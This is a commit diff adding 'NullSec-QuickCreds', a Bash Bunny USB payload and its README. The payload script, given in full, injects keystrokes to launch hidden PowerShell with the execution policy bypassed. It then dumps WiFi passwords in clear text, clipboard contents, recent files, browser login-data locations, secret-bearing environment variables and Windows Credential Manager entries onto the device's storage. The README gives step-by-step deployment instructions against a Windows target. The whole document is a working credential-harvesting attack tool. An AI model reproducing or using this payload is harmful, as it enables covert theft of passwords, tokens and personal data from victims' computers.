Add NullSec-QuickCreds multi-phase credential harvester

payloads/library/credentials/NullSec-QuickCreds/README.md

@@ -0,0 +1,65 @@
+# NullSec-QuickCreds
+
+> **Bash Bunny payload — Rapid Credential & Intelligence Harvester**
+
+## Description
+
+Multi-phase credential and intelligence harvester for Windows 10/11 targets. Combines HID keystroke injection with USB storage exfiltration for a grab-and-go attack.
+
+## Attack Phases
+
+| Phase | Target | Method |
+|-------|--------|--------|
+| 1 | WiFi Credentials | `netsh wlan` profile + key extraction |
+| 2 | System Info | OS, hostname, domain, IP addresses |
+| 3 | Clipboard | Current clipboard contents |
+| 4 | Recent Documents | Last 50 accessed files |
+| 5 | Browser Data | Checks for Chrome/Firefox/Edge/Brave profile paths |
+| 6 | Environment Secrets | Env vars matching token/key/secret/api patterns |
+| 7 | Saved Credentials | Windows Credential Manager (`cmdkey /list`) |
+| 8 | Network | Active ESTABLISHED connections |
+
+## Setup
+
+1. Copy `payload.txt` to switch position folder on your Bash Bunny
+2. Arm the switch to the corresponding position
+3. Insert into Windows target
+4. Wait for LED sequence: SETUP → ATTACK → FINISH
+5. Remove and check `loot/` folder on the Bash Bunny USB
+
+## Output Files
+
+```
+loot/quickcreds_YYYYMMDD_HHMMSS/
+├── wifi.txt          # WiFi SSIDs and passwords
+├── sysinfo.txt       # System identification
+├── clipboard.txt     # Clipboard contents
+├── recent_docs.txt   # Recently accessed files
+├── browser_paths.txt # Browser data locations
+├── env_secrets.txt   # Sensitive environment variables
+├── saved_creds.txt   # Windows Credential Manager
+└── connections.txt   # Active network connections
+```
+
+## LED Status
+
+| LED | Status |
+|-----|--------|
+| SETUP (Magenta) | Initializing attack mode |
+| ATTACK (Yellow) | Harvesting credentials |
+| FINISH (Green) | Complete — safe to remove |
+
+## Requirements
+
+- **Device:** Bash Bunny Mark I or II
+- **Target:** Windows 10/11
+- **Privileges:** Standard user (no admin needed)
+- **Duration:** ~15-20 seconds
+
+## Attack Mode
+
+`HID + STORAGE` — The Bash Bunny acts as both a keyboard (for injection) and a USB drive (for loot storage).
+
+## Author
+
+NullSec (bad-antics)

payloads/library/credentials/NullSec-QuickCreds/payload.txt

@@ -0,0 +1,105 @@
+#!/bin/bash
+#
+# NullSec-QuickCreds - Bash Bunny Credential Harvester
+# Author: NullSec (bad-antics)
+#
+# Rapid credential harvesting combining:
+# 1. Browser saved passwords (via LaZagne)
+# 2. WiFi profiles and keys
+# 3. Clipboard contents
+# 4. Recent documents
+# 5. Environment variables (may contain tokens)
+#
+# Results saved to BB USB storage.
+# Attack mode: HID + STORAGE
+#
+
+# Configuration
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+GET HOST_IP
+
+# Wait for target to register USB
+SLEEP 3
+
+# Loot directory
+LOOT_DIR=/root/udisk/loot/quickcreds_$(date +%Y%m%d_%H%M%S)
+mkdir -p "$LOOT_DIR"
+
+LED ATTACK
+
+# === Phase 1: WiFi Credentials ===
+Q SET_LANGUAGE us
+Q GUI r
+Q DELAY 1000
+Q STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
+Q ENTER
+Q DELAY 1500
+
+# Get the BB drive letter
+Q STRING \$bb = (Get-Volume -FileSystemLabel 'BashBunny' -ErrorAction SilentlyContinue).DriveLetter
+Q ENTER
+Q DELAY 500
+Q STRING if(-not \$bb){\$bb = (Get-Volume | Where-Object {\$_.DriveType -eq 'Removable' -and \$_.Size -gt 1GB} | Select-Object -First 1).DriveLetter}
+Q ENTER
+Q DELAY 300
+Q STRING \$loot = \"\${bb}:\\loot\"
+Q ENTER
+Q DELAY 300
+Q STRING New-Item -ItemType Directory -Path \$loot -Force | Out-Null
+Q ENTER
+Q DELAY 300
+
+# WiFi profiles
+Q STRING \$wifi = @(); (netsh wlan show profiles) | Select-String ':\s*(.+)\$' | ForEach-Object { \$name = \$_.Matches.Groups[1].Value.Trim(); \$detail = netsh wlan show profile name=\"\$name\" key=clear; \$key = (\$detail | Select-String 'Key Content\s+:\s+(.+)\$'); \$pw = if(\$key){\$key.Matches.Groups[1].Value.Trim()}else{'N/A'}; \$wifi += \"\$name = \$pw\" }; \$wifi | Out-File \"\$loot\\wifi.txt\"
+Q ENTER
+Q DELAY 2000
+
+# === Phase 2: System & User Info ===
+Q STRING \$info = @(\"Computer: \$env:COMPUTERNAME\", \"User: \$env:USERNAME\", \"Domain: \$env:USERDOMAIN\", \"OS: \$((Get-CimInstance Win32_OperatingSystem).Caption)\", \"IP: \$((Get-NetIPAddress -AddressFamily IPv4 | Where-Object {\$_.InterfaceAlias -notmatch 'Loopback'}).IPAddress -join ', ')\"); \$info | Out-File \"\$loot\\sysinfo.txt\"
+Q ENTER
+Q DELAY 1000
+
+# === Phase 3: Clipboard ===
+Q STRING Get-Clipboard | Out-File \"\$loot\\clipboard.txt\"
+Q ENTER
+Q DELAY 500
+
+# === Phase 4: Recent Documents ===
+Q STRING Get-ChildItem \"\$env:APPDATA\\Microsoft\\Windows\\Recent\\*.lnk\" | Select-Object Name, LastWriteTime | Sort-Object LastWriteTime -Descending | Select-Object -First 50 | Format-Table -AutoSize | Out-File \"\$loot\\recent_docs.txt\"
+Q ENTER
+Q DELAY 1000
+
+# === Phase 5: Browser Data Locations ===
+Q STRING \$browsers = @(); \$paths = @(\"\$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\", \"\$env:APPDATA\\Mozilla\\Firefox\\Profiles\", \"\$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\\Login Data\", \"\$env:LOCALAPPDATA\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data\"); foreach(\$p in \$paths){if(Test-Path \$p){\$browsers += \"FOUND: \$p\"}else{\$browsers += \"NOT FOUND: \$p\"}}; \$browsers | Out-File \"\$loot\\browser_paths.txt\"
+Q ENTER
+Q DELAY 500
+
+# === Phase 6: Environment Variables (may contain tokens/keys) ===
+Q STRING Get-ChildItem env: | Where-Object {\$_.Name -match 'token|key|secret|pass|api|auth|aws|azure|gcp'} | Format-Table Name, Value -AutoSize | Out-File \"\$loot\\env_secrets.txt\"
+Q ENTER
+Q DELAY 500
+
+# === Phase 7: Saved Credentials (cmdkey) ===
+Q STRING cmdkey /list | Out-File \"\$loot\\saved_creds.txt\"
+Q ENTER
+Q DELAY 500
+
+# === Phase 8: Network Connections ===
+Q STRING netstat -ano | Select-String 'ESTABLISHED' | Out-File \"\$loot\\connections.txt\"
+Q ENTER
+Q DELAY 500
+
+# === Cleanup: Close PowerShell ===
+Q DELAY 500
+Q STRING exit
+Q ENTER
+
+# Signal completion
+LED FINISH
+SLEEP 2
+
+# Sync and cleanup
+sync
+LED OFF